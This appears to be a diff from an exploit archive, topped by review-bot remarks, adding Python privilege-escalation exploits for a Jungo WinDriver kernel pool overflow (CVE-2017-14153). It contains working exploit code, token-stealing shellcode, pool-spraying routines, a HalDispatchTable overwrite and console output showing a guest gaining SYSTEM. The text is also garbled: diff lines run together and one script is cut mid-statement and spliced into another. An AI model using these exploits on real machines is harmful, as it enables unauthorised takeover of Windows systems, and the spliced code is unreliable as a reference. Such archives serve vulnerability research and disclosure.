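Review bot: `# Exploit Author: Ihsan Sencan` appears twice in the header block of the new file; the second copy should go. `# The vulnerability allows an users to inject sql commands....` would read better as `# The vulnerability allows an attacker to inject SQL commands via the 'id' parameter.`, which also ties the description to the two `index.php?action=...&id=[SQL]` examples below it. The header has no mitigation line; for this class the useful note is that `id` should be cast to an integer or bound as a query parameter before it reaches the database.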
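Review bot: The edited comment now reads `when the '` followed by `' service tries to reassemble` on the next line, so the service name `smbd` that the removed line carried is gone and the sentence is split in two; this looks like an editing accident rather than an intended rewording. Restore the old text: `Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets.` The surrounding comment block continues past the hunk.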
+++ b/platforms/windows/local/42624.py 
@@ -0,0 +1,410 @@ +# -*- coding: utf-8 -*- +""" +Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability + +Download: http://www.jungo.com/st/products/windriver/ +File: WD1240.EXE +Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba +Driver: windrvr1240.sys +Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad +CVE: CVE-2017-14153 +Author: Steven Seeley (mr_me) of Source Incite +Affected: <= v12.4.0 +Thanks: b33f, ryujin and sickness +Analysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html + +Summary: +======== + +This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. + +The specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel. 
+ +Timeline: +========= + +2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com +2017-08-25 – No response from Jungo and two bounced emails +2017-08-26 – Attempted a follow up with the vendor via website chat +2017-08-26 – No response via the website chat +2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it" +2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release +2017-09-06 – No response from Jungo +2017-09-06 – Public 0day release of advisory + +Example: +======== + +C:\Users\Guest\Desktop>icacls poc.py +poc.py NT AUTHORITY\Authenticated Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(F) + Mandatory Label\Low Mandatory Level:(I)(NW) + +Successfully processed 1 files; Failed processing 0 files + +C:\Users\Guest\Desktop>whoami +debugee\guest + +C:\Users\Guest\Desktop>poc.py + + --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] + Steven Seeley (mr_me) of Source Incite + +(+) spraying pool with mixed objects... +(+) sprayed the pool! +(+) making pool holes... +(+) made the pool holes! +(+) allocating shellcode... +(+) allocated the shellcode! +(+) triggering pool overflow... +(+) allocating pool overflow input buffer +(+) elevating privileges! +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
+ +C:\Users\Guest\Desktop>whoami +nt authority\system + +C:\Users\Guest\Desktop> +""" +from ctypes import * +from ctypes.wintypes import * +import struct, sys, os, time +from platform import release, architecture + +ntdll = windll.ntdll +kernel32 = windll.kernel32 +MEM_COMMIT = 0x00001000 +MEM_RESERVE = 0x00002000 +PAGE_EXECUTE_READWRITE = 0x00000040 +STATUS_SUCCESS = 0x0 +STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 +STATUS_INVALID_HANDLE = 0xC0000008 +SystemExtendedHandleInformation = 64 + +class LSA_UNICODE_STRING(Structure): + """Represent the LSA_UNICODE_STRING on ntdll.""" + _fields_ = [ + ("Length", USHORT), + ("MaximumLength", USHORT), + ("Buffer", LPWSTR), + ] + +class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): + """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" + _fields_ = [ + ("Object", c_void_p), + ("UniqueProcessId", ULONG), + ("HandleValue", ULONG), + ("GrantedAccess", ULONG), + ("CreatorBackTraceIndex", USHORT), + ("ObjectTypeIndex", USHORT), + ("HandleAttributes", ULONG), + ("Reserved", ULONG), + ] + +class SYSTEM_HANDLE_INFORMATION_EX(Structure): + """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" + _fields_ = [ + ("NumberOfHandles", ULONG), + ("Reserved", ULONG), + ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), + ] + +class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): + """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" + _fields_ = [ + ("Name", LSA_UNICODE_STRING), + ("Reserved", ULONG * 22), + ] + +class PROCESSENTRY32(Structure): + _fields_ = [ + ("dwSize", c_ulong), + ("cntUsage", c_ulong), + ("th32ProcessID", c_ulong), + ("th32DefaultHeapID", c_int), + ("th32ModuleID", c_ulong), + ("cntThreads", c_ulong), + ("th32ParentProcessID", c_ulong), + ("pcPriClassBase", c_long), + ("dwFlags", c_ulong), + ("szExeFile", c_wchar * MAX_PATH) + ] + +Process32First = kernel32.Process32FirstW +Process32Next = kernel32.Process32NextW + +def signed_to_unsigned(signed): + """ + Convert signed to unsigned integer. 
+ """ + unsigned, = struct.unpack ("L", struct.pack ("l", signed)) + return unsigned + +def get_type_info(handle): + """ + Get the handle type information to find our sprayed objects. + """ + public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() + size = DWORD(sizeof(public_object_type_information)) + while True: + result = signed_to_unsigned( + ntdll.NtQueryObject( + handle, 2, byref(public_object_type_information), size, None)) + if result == STATUS_SUCCESS: + return public_object_type_information.Name.Buffer + elif result == STATUS_INFO_LENGTH_MISMATCH: + size = DWORD(size.value * 4) + resize(public_object_type_information, size.value) + elif result == STATUS_INVALID_HANDLE: + return None + else: + raise x_file_handles("NtQueryObject.2", hex (result)) + +def get_handles(): + """ + Return all the processes handles in the system at the time. + Can be done from LI (Low Integrity) level on Windows 7 x86. + """ + system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() + size = DWORD (sizeof (system_handle_information)) + while True: + result = ntdll.NtQuerySystemInformation( + SystemExtendedHandleInformation, + byref(system_handle_information), + size, + byref(size) + ) + result = signed_to_unsigned(result) + if result == STATUS_SUCCESS: + break + elif result == STATUS_INFO_LENGTH_MISMATCH: + size = DWORD(size.value * 4) + resize(system_handle_information, size.value) + else: + raise x_file_handles("NtQuerySystemInformation", hex(result)) + + pHandles = cast( + system_handle_information.Handles, + POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ + system_handle_information.NumberOfHandles) + ) + for handle in pHandles.contents: + yield handle.UniqueProcessId, handle.HandleValue, handle.Object + +def we_can_alloc_shellcode(): + """ + This function allocates the shellcode @ the null page making + sure the new OkayToCloseProcedure pointer points to shellcode. 
+ """ + baseadd = c_int(0x00000004) + null_size = c_int(0x1000) + + tokenstealing = ( + "\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80" + "\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04" + "\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10" + "\x00" ) + + OkayToCloseProcedure = struct.pack(" 0: + return True + return False + +def alloc_pool_overflow_buffer(base, input_size): + """ + Craft our special buffer to trigger the overflow. + """ + print "(+) allocating pool overflow input buffer" + baseadd = c_int(base) + size = c_int(input_size) + input = "\x41" * 0x18 # offset to size + input += struct.pack("icacls poc.py +poc.py NT AUTHORITY\Authenticated Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(F) + Mandatory Label\Low Mandatory Level:(I)(NW) + +Successfully processed 1 files; Failed processing 0 files + +C:\Users\Guest\Desktop>whoami +debugee\guest + +C:\Users\Guest\Desktop>poc.py + + --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] + Steven Seeley (mr_me) of Source Incite + +(+) spraying pool with mixed objects... +(+) sprayed the pool! +(+) making pool holes... +(+) made the pool holes! +(+) allocating shellcode... +(+) allocated the shellcode! +(+) triggering pool overflow... +(+) allocating pool overflow input buffer +(+) elevating privileges! +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
+ +C:\Users\Guest\Desktop>whoami +nt authority\system + +C:\Users\Guest\Desktop> +""" +import os +import sys +import struct +from ctypes import * +from ctypes.wintypes import * +from platform import release, architecture + +kernel32 = windll.kernel32 +ntdll = windll.ntdll + +# GLOBAL VARIABLES +MEM_COMMIT = 0x00001000 +MEM_RESERVE = 0x00002000 +PAGE_EXECUTE_READWRITE = 0x00000040 +STATUS_SUCCESS = 0 + +class SYSTEM_MODULE_INFORMATION(Structure): + _fields_ = [("Reserved", c_void_p * 3), # this has an extra c_void_p because the first 4 bytes = number of return entries. + ("ImageBase", c_void_p), # it's not actually part of the structure, but we are aligning it. + ("ImageSize", c_ulong), + ("Flags", c_ulong), + ("LoadOrderIndex", c_ushort), + ("InitOrderIndex", c_ushort), + ("LoadCount", c_ushort), + ("ModuleNameOffset", c_ushort), + ("FullPathName", c_char * 256)] + +def alloc_shellcode(base, input_size, HalDispatchTable1): + """ + allocates some shellcode + """ + print "(+) allocating shellcode @ 0x%x" % base + baseadd = c_int(base) + size = c_int(input_size) + + # get the repair address + HalDispatchTable2 = struct.pack("| + input += "\x8B\x90\xF8\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET] + input += "\x89\x91\xF8\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx + # --[ recover] + input += "\xbe" + HalDispatchTable2 # mov esi, HalDispatchTable[2] + input += "\x8b\x16" # mov edx, [esi] + input += "\x81\xea\x12\x09\x00\x00" # sub edx, 0x912 + input += "\x83\xee\x04" # sub esi, 0x4 + input += "\x89\x16" # mov [esi], edx + input += "\x61" # popad + input += "\xC3" # ret + + input += "\xcc" * (input_size-len(input)) + ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, + POINTER(c_int), c_int, c_int] + dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, + byref(size), + MEM_RESERVE|MEM_COMMIT, + PAGE_EXECUTE_READWRITE) + if dwStatus != STATUS_SUCCESS: + print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff) 
+ return False + written = c_ulong() + write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written)) + if write == 0: + print "(-) Error while writing our input buffer memory: %s" % write + return False + return True + +def alloc(base, input_size): + """ + Just allocates things. + """ + baseadd = c_int(base) + size = c_int(input_size) + ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, + POINTER(c_int), c_int, c_int] + dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, + byref(size), + MEM_RESERVE|MEM_COMMIT, + PAGE_EXECUTE_READWRITE) + if dwStatus != STATUS_SUCCESS: + print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff) + return False + return True + +def mymemset(base, location, size): + """ + A cheap memset ¯\_(ツ)_/¯ + """ + input = location * (size/len(location)) + written = c_ulong() + + write = kernel32.WriteProcessMemory(0xFFFFFFFF, base, input, len(input), byref(written)) + if write == 0: + print "(-) Error while writing our input buffer memory: %s" % write + return False + return True + +def get_HALDispatchTable_kernel_address(): + """ + This function gets the HALDispatchTable's kernel address + """ + # allocate arbitrary buffer and call NtQuerySystemInformation + b = create_string_buffer(0) + systeminformationlength = c_ulong(0) + res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength)) + + # call NtQuerySystemInformation second time with right size + b = create_string_buffer(systeminformationlength.value) + res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength)) + + # marshal raw bytes for 1st entry + smi = SYSTEM_MODULE_INFORMATION() + memmove(addressof(smi), b, sizeof(smi)) + + # get kernel image name + kernelImage = smi.FullPathName.split('\\')[-1] + print "(+) found %s kernel base address: 0x%x" % (kernelImage, smi.ImageBase) + + # load kernel image in userland and get HAL Dispatch Table offset + 
hKernelImage = kernel32.LoadLibraryA(kernelImage) + print "(+) loading %s in userland" % kernelImage + print "(+) found %s Userland Base Address : 0x%x" % (kernelImage, hKernelImage) + hdt_user_address = kernel32.GetProcAddress(hKernelImage,"HalDispatchTable") + print "(+) found HalDispatchTable userland base address: 0x%x" % hdt_user_address + + # calculate HAL Dispatch Table offset in kernel land + hdt_kernel_address = smi.ImageBase + ( hdt_user_address - hKernelImage) + print "(+) found HalDispatchTable kernel base address: 0x%x" % hdt_kernel_address + return hdt_kernel_address + +def write_one_null_byte(HWD, in_buffer, location): + """ + The primitive function + """ + mymemset(in_buffer, location, 0x1000) + if HWD: + IoStatusBlock = c_ulong() + dev_ioctl = ntdll.ZwDeviceIoControlFile(HWD, + None, + None, + None, + byref(IoStatusBlock), + 0x953824a7, # target + in_buffer, # special buffer + 0x1000, # just the size to trigger with + 0x20000000, # whateva + 0x1000 # whateva + ) + # we could check dev_ioctl here I guess + return True + return False + +def we_can_elevate(h, in_buffer, base): + """ + This just performs the writes... + """ + + # get location of first byte write + where2write = struct.pack("